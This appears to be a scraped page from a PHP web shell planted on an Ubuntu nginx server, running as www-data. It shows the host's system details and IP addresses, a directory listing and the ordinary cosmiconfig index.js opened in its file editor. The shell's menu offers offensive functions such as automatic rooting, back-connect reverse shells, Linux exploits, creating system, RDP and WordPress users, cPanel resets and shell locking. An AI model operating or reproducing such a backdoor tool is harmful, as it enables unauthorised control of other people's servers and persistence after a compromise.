Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
cosmiconfig /
dist /
[ HOME SHELL ]
Name
Size
Permission
Action
Explorer.d.ts
550
B
-rw-rw-rw-
Explorer.d.ts.map
480
B
-rw-rw-rw-
Explorer.js
3.08
KB
-rw-rw-rw-
Explorer.js.map
6.56
KB
-rw-rw-rw-
ExplorerBase.d.ts
1.07
KB
-rw-rw-rw-
ExplorerBase.d.ts.map
1004
B
-rw-rw-rw-
ExplorerBase.js
3.36
KB
-rw-rw-rw-
ExplorerBase.js.map
7.35
KB
-rw-rw-rw-
ExplorerSync.d.ts
584
B
-rw-rw-rw-
ExplorerSync.d.ts.map
524
B
-rw-rw-rw-
ExplorerSync.js
3.06
KB
-rw-rw-rw-
ExplorerSync.js.map
6.43
KB
-rw-rw-rw-
cacheWrapper.d.ts
371
B
-rw-rw-rw-
cacheWrapper.d.ts.map
450
B
-rw-rw-rw-
cacheWrapper.js
612
B
-rw-rw-rw-
cacheWrapper.js.map
1.43
KB
-rw-rw-rw-
getDirectory.d.ts
212
B
-rw-rw-rw-
getDirectory.d.ts.map
280
B
-rw-rw-rw-
getDirectory.js
900
B
-rw-rw-rw-
getDirectory.js.map
1.29
KB
-rw-rw-rw-
getPropertyByPath.d.ts
193
B
-rw-rw-rw-
getPropertyByPath.d.ts.map
301
B
-rw-rw-rw-
getPropertyByPath.js
938
B
-rw-rw-rw-
getPropertyByPath.js.map
1.67
KB
-rw-rw-rw-
index.d.ts
1.88
KB
-rw-rw-rw-
index.d.ts.map
1.18
KB
-rw-rw-rw-
index.js
2.93
KB
-rw-rw-rw-
index.js.map
6.87
KB
-rw-rw-rw-
loaders.d.ts
132
B
-rw-rw-rw-
loaders.d.ts.map
216
B
-rw-rw-rw-
loaders.js
1.13
KB
-rw-rw-rw-
loaders.js.map
2.68
KB
-rw-rw-rw-
readFile.d.ts
295
B
-rw-rw-rw-
readFile.d.ts.map
385
B
-rw-rw-rw-
readFile.js
1.29
KB
-rw-rw-rw-
readFile.js.map
2.62
KB
-rw-rw-rw-
types.d.ts
635
B
-rw-rw-rw-
types.d.ts.map
684
B
-rw-rw-rw-
types.js
113
B
-rw-rw-rw-
types.js.map
89
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports.cosmiconfig = cosmiconfig; exports.cosmiconfigSync = cosmiconfigSync; exports.defaultLoaders = void 0; var _os = _interopRequireDefault(require("os")); var _Explorer = require("./Explorer"); var _ExplorerSync = require("./ExplorerSync"); var _loaders = require("./loaders"); var _types = require("./types"); function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } /* eslint-disable @typescript-eslint/explicit-module-boundary-types */ // eslint-disable-next-line @typescript-eslint/explicit-function-return-type function cosmiconfig(moduleName, options = {}) { const normalizedOptions = normalizeOptions(moduleName, options); const explorer = new _Explorer.Explorer(normalizedOptions); return { search: explorer.search.bind(explorer), load: explorer.load.bind(explorer), clearLoadCache: explorer.clearLoadCache.bind(explorer), clearSearchCache: explorer.clearSearchCache.bind(explorer), clearCaches: explorer.clearCaches.bind(explorer) }; } // eslint-disable-next-line @typescript-eslint/explicit-function-return-type function cosmiconfigSync(moduleName, options = {}) { const normalizedOptions = normalizeOptions(moduleName, options); const explorerSync = new _ExplorerSync.ExplorerSync(normalizedOptions); return { search: explorerSync.searchSync.bind(explorerSync), load: explorerSync.loadSync.bind(explorerSync), clearLoadCache: explorerSync.clearLoadCache.bind(explorerSync), clearSearchCache: explorerSync.clearSearchCache.bind(explorerSync), clearCaches: explorerSync.clearCaches.bind(explorerSync) }; } // do not allow mutation of default loaders. Make sure it is set inside options const defaultLoaders = Object.freeze({ '.cjs': _loaders.loaders.loadJs, '.js': _loaders.loaders.loadJs, '.json': _loaders.loaders.loadJson, '.yaml': _loaders.loaders.loadYaml, '.yml': _loaders.loaders.loadYaml, noExt: _loaders.loaders.loadYaml }); exports.defaultLoaders = defaultLoaders; const identity = function identity(x) { return x; }; function normalizeOptions(moduleName, options) { const defaults = { packageProp: moduleName, searchPlaces: ['package.json', `.${moduleName}rc`, `.${moduleName}rc.json`, `.${moduleName}rc.yaml`, `.${moduleName}rc.yml`, `.${moduleName}rc.js`, `.${moduleName}rc.cjs`, `.config/${moduleName}rc`, `.config/${moduleName}rc.json`, `.config/${moduleName}rc.yaml`, `.config/${moduleName}rc.yml`, `.config/${moduleName}rc.js`, `.config/${moduleName}rc.cjs`, `${moduleName}.config.js`, `${moduleName}.config.cjs`], ignoreEmptySearchPlaces: true, stopDir: _os.default.homedir(), cache: true, transform: identity, loaders: defaultLoaders }; const normalizedOptions = { ...defaults, ...options, loaders: { ...defaults.loaders, ...options.loaders } }; return normalizedOptions; } //# sourceMappingURL=index.js.map
Close